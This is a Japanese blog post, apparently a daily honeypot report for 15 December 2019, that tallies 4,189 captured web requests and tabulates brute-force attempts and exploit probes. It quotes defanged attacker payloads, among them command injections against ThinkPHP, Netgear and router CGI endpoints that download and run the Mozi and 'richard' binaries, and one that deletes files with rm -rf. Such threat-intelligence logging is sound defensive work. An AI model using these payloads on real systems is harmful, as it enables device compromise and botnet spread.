WOWHoneypot観察(274日目)
2019/12/15(日)
トータルは4189件でした。
ハンティングログは以下です。
| 149.202.251[.]78 wget hxxp[:]//80.82.64[.]14/richard; curl -O hxxp[:]//80.82.64[.]14/richard |
| 149.202.251[.]78 curl -O hxxp[:]//80.82.64[.]14/richard |
| 37.255.67[.]199 wget${IFS}-qO-${IFS}hxxp[:]//104.244.75[.]222/b |
www.virustotal.com
www.virustotal.com
| 113.220.30[.]96 wget+hxxp[:]//192.168.1[.]1:8088/Mozi.m |
| 件数 | 概要 | リクエスト |
|---|---|---|
| 4002 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
| 55 | WordPressに対するブルートフォース攻撃 | GET /wp-login.php |
| 54 | WordPressに対するブルートフォース攻撃 | POST /wp-login.php |
| 45 | アクセス | GET / |
| 10 | WordPress の Pingback を狙ったブルートフォース攻撃 | POST /xmlrpc.php |
| 5 | アクセス | GET /favicon.ico |
| 2 | DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 | POST /editBlackAndWhiteList |
| 2 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
| 1 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
| 1 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
| 1 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
| 1 | クローリング | HEAD /robots.txt |
| 1 | サイト構成の調査 | GET /sitemap.xml |
| 1 | DGN1000 Netgear ルータを狙うMirai亜種の攻撃 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+hxxp[:]//192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
| 1 | DGN1000 Netgear ルータを狙うMirai亜種の攻撃 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 |
| 1 | クローリング | GET /robots.txt |
| 1 | Silverlightのドメイン間ポリシーファイルの調査 | GET /clientaccesspolicy.xml |
| 1 | ルータの脆弱性を狙った通信 | GET /cgi-bin/masterCGI?ping=nomip&user=;wget%20hxxp[:]//80.82.64.14/richard;%20curl%20-O%20hxxp[:]//80.82.64.14/richard;%20chmod%20+x%20richard;%20sh%20richard |
| 1 | WSManの調査 | GET /WSMAN |
| 1 | WordPressの調査 | GET ///wp-json/wp/v2/users/ |
| 1 | WordPressの調査 | GET ///?author=1 |
| 1 | SSL証明書発行時の一時ファイルの調査 | GET /.well-known/security.txt |
にほんブログ村